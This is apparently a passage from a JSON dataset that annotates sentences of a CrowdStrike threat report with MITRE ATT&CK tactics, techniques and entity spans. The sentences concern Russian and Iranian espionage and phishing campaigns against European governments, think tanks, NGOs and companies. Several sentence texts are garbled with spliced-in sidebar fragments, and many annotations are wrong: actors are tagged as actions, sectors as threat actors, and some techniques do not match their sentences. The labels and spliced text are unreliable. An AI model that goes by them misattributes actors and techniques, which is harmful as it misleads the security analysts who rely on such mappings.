Russia’s wide-ranging intelligence collection requirements against military and critical infrastructure targets.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p29-s190-b04f20", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 29, "sentence_id": 190, "context_before": "This highlights Russia’s wide-ranging intelligence collection requirements against military and critical infrastructure targets.", "sentence_text": "European Energy Sector Used in Lure Content In an April 2024 campaign, FANCY BEAR used renewable energy-themed lures, likely indicating that energy is a significant RIS collection priority due to heavy sanctions on Russia's oil and gas sector.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1591.002", "name": "Business Relationships" } ], "procedure": "use renewable energy-themed lures for intelligence collection on energy sector", "entities": [ { "text": "European Energy Sector ", "start": 0, "end": 23, "label": "ThreatActor" }, { "text": "FANCY BEAR", "start": 71, "end": 81, "label": "Action" }, { "text": " renewable energy-themed lures", "start": 86, "end": 116, "label": "Action" }, { "text": " Used in Lure Content", "start": 22, "end": 43, "label": "Action" }, { "text": "RIS ", "start": 165, "end": 169, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p29-s191-6fff6a", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 29, "sentence_id": 191, "context_before": "European Energy Sector Used in Lure Content In an April 2024 campaign, FANCY BEAR used renewable energy-themed lures, likely indicating that energy is a significant RIS collection priority due to heavy sanctions on Russia's oil and gas sector.", "sentence_text": "FANCY BEAR used a subdomain hosting a lure document spoofing an energy sector intergovernmental organization’s “energy profile” of Austria.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "use subdomain with spoofed energy profile document targeting Austria", "entities": [ { "text": "FANCY BEAR", "start": 0, "end": 10, "label": "Action" }, { "text": "spoofing", "start": 52, "end": 60, "label": "Action" }, { "text": " lure document ", "start": 37, "end": 52, "label": "MalwareTool" }, { "text": "energy sector", "start": 64, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "subdomain ", "start": 18, "end": 28, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p29-s192-56342f", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 29, "sentence_id": 192, "context_before": "FANCY BEAR used a subdomain hosting a lure document spoofing an energy sector intergovernmental organization’s “energy profile” of Austria.", "sentence_text": "As of December 2023, Austria imported 98% of its gas from Russia.21 Austria's Energy Minister announced in February 2024 that the country was seeking to end its import contract with Gazprom.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p29-s193-4a4a60", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 29, "sentence_id": 193, "context_before": "As of December 2023, Austria imported 98% of its gas from Russia.21 Austria's Energy Minister announced in February 2024 that the country was seeking to end its import contract with Gazprom.", "sentence_text": "FANCY BEAR used a lure to target European energy entities.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Use a lure to target European energy entities.", "entities": [ { "text": "FANCY BEAR", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "used a lure to target European energy entities", "start": 11, "end": 57, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p29-s194-91114f", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 29, "sentence_id": 194, "context_before": "FANCY BEAR used a lure to target European energy entities.", "sentence_text": "The operation demonstrates Russia's long-term intelligence requirements regarding European energy relationships and policy developments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p29-s195-ed3e46", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 29, "sentence_id": 195, "context_before": "The operation demonstrates Russia's long-term intelligence requirements regarding European energy relationships and policy developments.", "sentence_text": "European Think Tank Sector Targeting Between late 2023 and Q2 2024, FSB-operated group GOSSAMER BEAR conducted credential phishing campaigns against U.K. think tanks DURING THEIR OCTOBER 2024 PHISHING CAMPAIGN, COZY BEAR REGISTERED MORE specializing in international affairs, defense, and security.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "conduct credential phishing campaigns against U.K. think tanks specializing in international affairs, defense, and security", "entities": [ { "text": " GOSSAMER BEAR ", "start": 86, "end": 101, "label": "ThreatActor" }, { "text": "credential phishing", "start": 111, "end": 130, "label": "Action" }, { "text": " U.K. think tanks", "start": 148, "end": 165, "label": "Infrastructure_Indicator" }, { "text": "4 PHISHING CAMPAIGN", "start": 190, "end": 209, "label": "Action" }, { "text": "COZY BEAR", "start": 211, "end": 220, "label": "ThreatActor" }, { "text": "REGISTERED ", "start": 221, "end": 232, "label": "Action" }, { "text": " FSB-operated group", "start": 67, "end": 86, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p29-s196-fd7998", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 29, "sentence_id": 196, "context_before": "European Think Tank Sector Targeting Between late 2023 and Q2 2024, FSB-operated group GOSSAMER BEAR conducted credential phishing campaigns against U.K. think tanks DURING THEIR OCTOBER 2024 PHISHING CAMPAIGN, COZY BEAR REGISTERED MORE specializing in international affairs, defense, and security.", "sentence_text": "The adversary likely THAN 180 DOMAINS SPOOFING THINK weaponized the obtained data in subsequent hack-and-leak influence operations.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1583.001", "name": "Acquire Infrastructure: Domains" } ], "procedure": "Register spoofed domains and weaponize obtained data in subsequent hack-and-leak influence operations.", "entities": [ { "text": "weaponized the obtained data", "start": 53, "end": 81, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p29-s197-09e8e3", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 29, "sentence_id": 197, "context_before": "The adversary likely THAN 180 DOMAINS SPOOFING THINK weaponized the obtained data in subsequent hack-and-leak influence operations.", "sentence_text": "TANKS AND DEFENSE ENTITIES, FANCY BEAR also exploited NTLM vulnerabilities against a Romanian government INDICATING THE LIKELY HIGH PRIORITY entity and likely against a German think tank as part of their intelligence PLACED ON MONITORING HIGH-VALUE collection operations.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1557", "name": "Adversary-in-the-Middle" } ], "procedure": "exploited NTLM vulnerabilities", "entities": [ { "text": "FANCY BEAR", "start": 28, "end": 38, "label": "ThreatActor" }, { "text": "collection operations", "start": 249, "end": 270, "label": "Action" }, { "text": " exploited NTLM ", "start": 43, "end": 59, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p29-s198-07122b", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 29, "sentence_id": 198, "context_before": "TANKS AND DEFENSE ENTITIES, FANCY BEAR also exploited NTLM vulnerabilities against a Romanian government INDICATING THE LIKELY HIGH PRIORITY entity and likely against a German think tank as part of their intelligence PLACED ON MONITORING HIGH-VALUE collection operations.", "sentence_text": "Meanwhile, COZY BEAR's DiplomaticOrbiter campaign WESTERN GOVERNMENT, TECHNOLOGY, targeted Western think tanks as part of routine intelligence collection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p29-s199-633307", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 29, "sentence_id": 199, "context_before": "Meanwhile, COZY BEAR's DiplomaticOrbiter campaign WESTERN GOVERNMENT, TECHNOLOGY, targeted Western think tanks as part of routine intelligence collection.", "sentence_text": "DEFENSE, AND NONPROFIT ENTITIES FOR STRATEGIC INTELLIGENCE COLLECTION.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p29-s200-06176e", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 29, "sentence_id": 200, "context_before": "DEFENSE, AND NONPROFIT ENTITIES FOR STRATEGIC INTELLIGENCE COLLECTION.", "sentence_text": "European Media and NGO Sector Targeting GOSSAMER BEAR has targeted European media and NGO entities through hack-and-leak campaigns, weaponizing stolen documents for IO.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p29-s201-618dba", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 29, "sentence_id": 201, "context_before": "European Media and NGO Sector Targeting GOSSAMER BEAR has targeted European media and NGO entities through hack-and-leak campaigns, weaponizing stolen documents for IO.", "sentence_text": "From January 2025 to August 2025, GOSSAMER BEAR continued credential phishing operations likely targeting think tank, dissident, and NGO entities in Europe and Africa.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1589.001", "name": "Credentials" } ], "procedure": "credential phishing operations", "entities": [ { "text": " GOSSAMER BEAR", "start": 33, "end": 47, "label": "ThreatActor" }, { "text": " credential phishing", "start": 57, "end": 77, "label": "Action" }, { "text": " targeting", "start": 95, "end": 105, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p29-s202-142f6a", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 29, "sentence_id": 202, "context_before": "From January 2025 to August 2025, GOSSAMER BEAR continued credential phishing operations likely targeting think tank, dissident, and NGO entities in Europe and Africa.", "sentence_text": "Following the October 2023 start of the Israel-Hamas conflict, GOSSAMER BEAR registered multiple domains spoofing a European law enforcement entity to capture Microsoft Outlook credentials from associated individuals.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1586.002", "name": "Email Accounts" } ], "procedure": "registered domains spoofing entity to capture credentials", "entities": [ { "text": "GOSSAMER BEAR", "start": 63, "end": 76, "label": "ThreatActor" }, { "text": " spoofing", "start": 104, "end": 113, "label": "Action" }, { "text": "capture", "start": 151, "end": 158, "label": "Action" }, { "text": " European law enforcement entity", "start": 115, "end": 147, "label": "Infrastructure_Indicator" }, { "text": "Microsoft Outlook credentials ", "start": 159, "end": 189, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p29-s203-26e48d", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 29, "sentence_id": 203, "context_before": "Following the October 2023 start of the Israel-Hamas conflict, GOSSAMER BEAR registered multiple domains spoofing a European law enforcement entity to capture Microsoft Outlook credentials from associated individuals.", "sentence_text": "Russia has been positioning itself as an alternative to Western partners for Africa as EU and U.S. forces reduce their continental presence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p29-s204-d367e3", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 29, "sentence_id": 204, "context_before": "Russia has been positioning itself as an alternative to Western partners for Africa as EU and U.S. forces reduce their continental presence.", "sentence_text": "GOSSAMER BEAR's intelligence collection and IO campaigns often involve hack-and-leak operations weaponizing stolen documents from government, media, think tank, and NGO entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p29-s205-7e3f59", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 29, "sentence_id": 205, "context_before": "GOSSAMER BEAR's intelligence collection and IO campaigns often involve hack-and-leak operations weaponizing stolen documents from government, media, think tank, and NGO entities.", "sentence_text": "In January 2024, VENOMOUS BEAR targeted a Polish NGO with a novel backdoor named dcmd.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "targeted with a novel backdoor", "entities": [ { "text": "VENOMOUS BEAR ", "start": 17, "end": 31, "label": "ThreatActor" }, { "text": "l backdoor", "start": 64, "end": 74, "label": "MalwareTool" }, { "text": " dcmd", "start": 80, "end": 85, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p29-s206-2dee67", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 29, "sentence_id": 206, "context_before": "In January 2024, VENOMOUS BEAR targeted a Polish NGO with a novel backdoor named dcmd.", "sentence_text": "This activity aligned with the adversary’s long-term intelligence collection requirements and with their increased targeting of Polish entities, likely due to Poland receiving refugees from and providing aid to Ukraine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p29-s207-60396c", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 29, "sentence_id": 207, "context_before": "This activity aligned with the adversary’s long-term intelligence collection requirements and with their increased targeting of Polish entities, likely due to Poland receiving refugees from and providing aid to Ukraine.", "sentence_text": "21 https://www.reuters.com/markets/europe/austria-seeking-end-russian-gas-import-contract-energy-minister-says-2024-02-12/\n22 Russia designates organizations that it perceives as a foreign threat to Russian state interests as “undesirable,” prohibiting those organizations from conducting business within Russia.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p30-s208-02948d", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 30, "sentence_id": 208, "context_before": "21 https://www.reuters.com/markets/europe/austria-seeking-end-russian-gas-import-contract-energy-minister-says-2024-02-12/\n22 Russia designates organizations that it perceives as a foreign threat to Russian state interests as “undesirable,” prohibiting those organizations from conducting business within Russia.", "sentence_text": "Though Iran will likely refrain from disruptive or destructive offensive cyber activity during its ongoing attempts to return to nuclear negotiations, Iran-nexus threat actors still pose a heightened threat to European nations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p30-s209-fd6012", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 30, "sentence_id": 209, "context_before": "Though Iran will likely refrain from disruptive or destructive offensive cyber activity during its ongoing attempts to return to nuclear negotiations, Iran-nexus threat actors still pose a heightened threat to European nations.", "sentence_text": "European Government Sector Targeting Iran-nexus adversaries have consistently targeted European government entities, particularly those opposing Iranian state interests.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p30-s210-a368de", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 30, "sentence_id": 210, "context_before": "European Government Sector Targeting Iran-nexus adversaries have consistently targeted European government entities, particularly those opposing Iranian state interests.", "sentence_text": "Likely beginning in January 2025 through March 2025, an unattributed Iran-nexus threat actor conducted a spear-phishing campaign targeting a prominent EU parliament representative from Germany who leads efforts supporting Iranian opposition groups.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "conducted spear-phishing campaign", "entities": [ { "text": "Iran-nexus threat actor", "start": 69, "end": 92, "label": "ThreatActor" }, { "text": " targeting ", "start": 128, "end": 139, "label": "Action" }, { "text": "spear-phishing", "start": 105, "end": 119, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p30-s211-deda96", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 30, "sentence_id": 211, "context_before": "Likely beginning in January 2025 through March 2025, an unattributed Iran-nexus threat actor conducted a spear-phishing campaign targeting a prominent EU parliament representative from Germany who leads efforts supporting Iranian opposition groups.", "sentence_text": "The campaign leveraged voice calls and elaborate social engineering, with the German politician’s staff reportedly receiving messages and phone calls from unknown threat actors impersonating a legitimate contact associated with a U.S.-based think tank.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1566.003", "name": "Spearphishing via Service" } ], "procedure": "leveraged voice calls and social engineering, impersonating a contact", "entities": [ { "text": " leveraged", "start": 12, "end": 22, "label": "Action" }, { "text": "threat actors ", "start": 163, "end": 177, "label": "ThreatActor" }, { "text": "impersonating ", "start": 177, "end": 191, "label": "Action" }, { "text": " social engineering", "start": 48, "end": 67, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p30-s212-030a27", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 30, "sentence_id": 212, "context_before": "The campaign leveraged voice calls and elaborate social engineering, with the German politician’s staff reportedly receiving messages and phone calls from unknown threat actors impersonating a legitimate contact associated with a U.S.-based think tank.", "sentence_text": "Eventually, the threat actors compromised and installed malicious software on a laptop from the politician’s office.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "compromised and installed malicious software on a laptop", "entities": [ { "text": "threat actors", "start": 16, "end": 29, "label": "ThreatActor" }, { "text": "compromised", "start": 30, "end": 41, "label": "Action" }, { "text": " installed", "start": 45, "end": 55, "label": "Action" }, { "text": " malicious software", "start": 55, "end": 74, "label": "MalwareTool" }, { "text": "laptop", "start": 80, "end": 86, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p30-s213-0e72df", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 30, "sentence_id": 213, "context_before": "Eventually, the threat actors compromised and installed malicious software on a laptop from the politician’s office.", "sentence_text": "Though the threat actors successfully compromised the target's systems, EU parliament security measures reportedly prevented any sensitive data theft.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1480", "name": "Execution Guardrails" } ], "procedure": "Successfully compromise the target's systems, but fail to steal sensitive data due to security measures.", "entities": [ { "text": "the threat actors", "start": 7, "end": 24, "label": "ThreatActor" }, { "text": "successfully compromised the target's systems", "start": 25, "end": 70, "label": "Action" }, { "text": "target's systems", "start": 54, "end": 70, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p30-s214-922fa0", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 30, "sentence_id": 214, "context_before": "Though the threat actors successfully compromised the target's systems, EU parliament security measures reportedly prevented any sensitive data theft.", "sentence_text": "The German politician was likely selected as a phishing target due to their political position and professional proximity to Iranian dissidents.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p30-s215-911744", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 30, "sentence_id": 215, "context_before": "The German politician was likely selected as a phishing target due to their political position and professional proximity to Iranian dissidents.", "sentence_text": "23 https://www.iranintl.com/en/202507268188", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p31-s216-641b65", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 31, "sentence_id": 216, "context_before": "23 https://www.iranintl.com/en/202507268188", "sentence_text": "European Financial Services Sector Targeting In May 2024, CHARMING KITTEN targeted U.K.-based financial entities with phishing campaigns to gather intelligence.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "targeted with phishing campaigns to gather intelligence", "entities": [ { "text": "Targeting", "start": 35, "end": 44, "label": "Action" }, { "text": " phishing", "start": 117, "end": 126, "label": "Action" }, { "text": " gather intelligence", "start": 139, "end": 159, "label": "Action" }, { "text": " CHARMING KITTEN", "start": 57, "end": 73, "label": "ThreatActor" }, { "text": " U.K.-based financial entities", "start": 82, "end": 112, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p31-s217-76887c", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 31, "sentence_id": 217, "context_before": "European Financial Services Sector Targeting In May 2024, CHARMING KITTEN targeted U.K.-based financial entities with phishing campaigns to gather intelligence.", "sentence_text": "The adversary also consistently abused legitimate services such as Microsoft OneDrive to deliver their custom malware.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "abused Microsoft OneDrive to deliver custom malware", "entities": [ { "text": "The adversary", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "Microsoft OneDrive", "start": 67, "end": 85, "label": "Infrastructure_Indicator" }, { "text": "custom malware", "start": 103, "end": 117, "label": "MalwareTool" }, { "text": "abused legitimate services such as Microsoft OneDrive to deliver their custom malware", "start": 32, "end": 117, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p31-s218-cca111", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 31, "sentence_id": 218, "context_before": "The adversary also consistently abused legitimate services such as Microsoft OneDrive to deliver their custom malware.", "sentence_text": "European Transportation Sector Targeting In mid-July 2025, PULSAR KITTEN likely conducted a spear-phishing operation targeting the German branch of a U.S.-based transportation company.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "onducted spear-phishing operation", "entities": [ { "text": " PULSAR KITTEN", "start": 58, "end": 72, "label": "ThreatActor" }, { "text": " spear-phishing", "start": 91, "end": 106, "label": "Action" }, { "text": "targeting", "start": 117, "end": 126, "label": "Action" }, { "text": "transportation company", "start": 161, "end": 183, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p31-s219-e065c1", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 31, "sentence_id": 219, "context_before": "European Transportation Sector Targeting In mid-July 2025, PULSAR KITTEN likely conducted a spear-phishing operation targeting the German branch of a U.S.-based transportation company.", "sentence_text": "The adversary used aviation-themed job offers to deliver their sophisticated SilkySand malware through the legitimate file-sharing service ONLYOFFICE.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "used aviation-themed job offers to deliver malware", "entities": [ { "text": " adversary", "start": 3, "end": 13, "label": "ThreatActor" }, { "text": "deliver", "start": 49, "end": 56, "label": "Action" }, { "text": "SilkySand malware", "start": 77, "end": 94, "label": "MalwareTool" }, { "text": "ONLYOFFICE", "start": 139, "end": 149, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p31-s220-6f0357", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 31, "sentence_id": 220, "context_before": "The adversary used aviation-themed job offers to deliver their sophisticated SilkySand malware through the legitimate file-sharing service ONLYOFFICE.", "sentence_text": "The adversary conducted this operation amid rising tensions between Iran and Germany, particularly following controversial statements about the Israel-Iran conflict and European threats of renewed sanctions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p31-s221-301bf8", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 31, "sentence_id": 221, "context_before": "The adversary conducted this operation amid rising tensions between Iran and Germany, particularly following controversial statements about the Israel-Iran conflict and European threats of renewed sanctions.", "sentence_text": "The operation served both political and intelligence-gathering purposes, advancing Iran’s counterintelligence interests in Western Europe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p31-s222-273e52", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 31, "sentence_id": 222, "context_before": "The operation served both political and intelligence-gathering purposes, advancing Iran’s counterintelligence interests in Western Europe.", "sentence_text": "PULSAR KITTEN has previously spoofed German automotive manufacturer websites but has not previously been observed targeting transportation entities.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "spoofed German automotive manufacturer websites", "entities": [ { "text": "PULSAR KITTEN", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "spoofed", "start": 29, "end": 36, "label": "Action" }, { "text": "German automotive manufacturer websites", "start": 37, "end": 76, "label": "Infrastructure_Indicator" }, { "text": " targeting", "start": 113, "end": 123, "label": "Action" }, { "text": "transportation entities", "start": 124, "end": 147, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p32-s223-dcdfbd", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 32, "sentence_id": 223, "context_before": "PULSAR KITTEN has previously spoofed German automotive manufacturer websites but has not previously been observed targeting transportation entities.", "sentence_text": "European NGO Sector Targeting In August 2025, STATIC KITTEN conducted an intelligence-gathering campaign targeting the Southeast Asia branch of a Switzerland-based NGO.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1589", "name": "Gather Victim Identity Information" } ], "procedure": "conducted intelligence-gathering campaign", "entities": [ { "text": "STATIC KITTEN", "start": 46, "end": 59, "label": "ThreatActor" }, { "text": "intelligence-gathering ", "start": 73, "end": 96, "label": "Action" }, { "text": " targeting ", "start": 104, "end": 115, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p32-s224-359a43", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 32, "sentence_id": 224, "context_before": "European NGO Sector Targeting In August 2025, STATIC KITTEN conducted an intelligence-gathering campaign targeting the Southeast Asia branch of a Switzerland-based NGO.", "sentence_text": "The adversary likely gained initial access to the entity through a web server compromise;\nhowever, the NGO has not confirmed this.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "gained initial access through web server compromise", "entities": [ { "text": "adversary ", "start": 4, "end": 14, "label": "ThreatActor" }, { "text": " gained initial access", "start": 20, "end": 42, "label": "Action" }, { "text": " web server", "start": 66, "end": 77, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p32-s225-81e332", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 32, "sentence_id": 225, "context_before": "The adversary likely gained initial access to the entity through a web server compromise;\nhowever, the NGO has not confirmed this.", "sentence_text": "Once STATIC KITTEN established a foothold, they used a compromised service account to move laterally through the network.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1550.002", "name": "Pass the Hash" } ], "procedure": "used compromised service account to move laterally", "entities": [ { "text": "STATIC KITTEN ", "start": 5, "end": 19, "label": "ThreatActor" }, { "text": "established", "start": 19, "end": 30, "label": "Action" }, { "text": "used", "start": 48, "end": 52, "label": "Action" }, { "text": "compromised service account ", "start": 55, "end": 83, "label": "Infrastructure_Indicator" }, { "text": "laterally through", "start": 91, "end": 108, "label": "Action" }, { "text": "network", "start": 113, "end": 120, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p32-s226-ae1da1", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 32, "sentence_id": 226, "context_before": "Once STATIC KITTEN established a foothold, they used a compromised service account to move laterally through the network.", "sentence_text": "Using their elevated access, the adversary invoked PowerShell to download a malicious payload from an adversary-controlled IP address.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "invoked PowerShell to download payload", "entities": [ { "text": " adversary", "start": 32, "end": 42, "label": "ThreatActor" }, { "text": " invoked", "start": 42, "end": 50, "label": "Action" }, { "text": " PowerShell", "start": 50, "end": 61, "label": "MalwareTool" }, { "text": " download ", "start": 64, "end": 74, "label": "Action" }, { "text": "malicious payload", "start": 76, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "adversary-controlled IP address", "start": 102, "end": 133, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p32-s227-82f4d8", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 32, "sentence_id": 227, "context_before": "Using their elevated access, the adversary invoked PowerShell to download a malicious payload from an adversary-controlled IP address.", "sentence_text": "Lastly, they attempted to write registry hives to disk and harvest credentials, almost certainly in preparation for exfiltration.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003.002", "name": "Security Account Manager" } ], "procedure": "write registry hives and harvest credentials", "entities": [ { "text": "attempted", "start": 13, "end": 22, "label": "Action" }, { "text": " harvest credentials", "start": 58, "end": 78, "label": "Action" }, { "text": " exfiltration", "start": 115, "end": 128, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p32-s229-3ff045", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 32, "sentence_id": 229, "context_before": "HAYWIRE KITTEN", "sentence_text": "Likely Phishing Campaign Targets Western Europe Starting in at least December 2024 through July 2025, HAYWIRE KITTEN likely conducted an extensive Microsoft- themed phishing campaign targeting Western organizations across various sectors.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "conducted Microsoft-themed phishing campaign", "entities": [ { "text": " Phishing ", "start": 6, "end": 16, "label": "Action" }, { "text": " HAYWIRE KITTEN", "start": 101, "end": 116, "label": "ThreatActor" }, { "text": "conducted", "start": 124, "end": 133, "label": "Action" }, { "text": " Microsoft", "start": 146, "end": 156, "label": "Infrastructure_Indicator" }, { "text": " phishing", "start": 164, "end": 173, "label": "Action" }, { "text": "targeting", "start": 